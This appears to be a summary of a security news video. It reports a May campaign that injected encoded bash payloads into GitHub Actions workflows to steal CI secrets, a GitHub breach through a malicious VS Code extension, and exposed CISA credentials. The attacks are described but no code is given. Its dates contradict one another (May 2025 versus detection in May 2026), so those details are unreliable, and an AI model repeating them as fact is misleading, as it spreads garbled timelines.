GitHub Faces Major Security Breaches in May 2025

🎬 GitHub faced two major security incidents in May 2025, starting with the "Megalodon" campaign, where attackers used automated commits to inject Base64-encoded bash payloads into GitHub Actions workflow files across 5,561 repositories, exfiltrating CI secrets, cloud credentials, SSH keys, and OIDC tokens to a command-and-control (C2) server. The attack leveraged compromised personal access tokens or deploy keys, with threat actors forging identities using throwaway accounts and routine CI maintenance commit messages. Hudson Rock’s analysis linked 33% of the 978 unique usernames to prior info stealer infections, suggesting stolen credentials were reused. Separately, GitHub’s internal repositories were breached after an employee installed a malicious VS Code extension ("NX Console"), leading to the exfiltration of 38,000 private repos, including customer support data, with the attack attributed to "Team PCP," who later offered the stolen data for sale at a minimum of $50,000. GitHub detected the breach on May 18, 2026, and rotated high-impact credentials, while CISA inadvertently exposed sensitive credentials, including AWS GovCloud tokens, in a public GitHub repo created in November 2025. OpenAI partnered with 1Password to enable AI coding agents to securely access credentials, and Discord implemented mandatory end-to-end encryption for voice and video calls. The video also celebrated Hack5’s 21st anniversary and 1 million YouTube subscribers.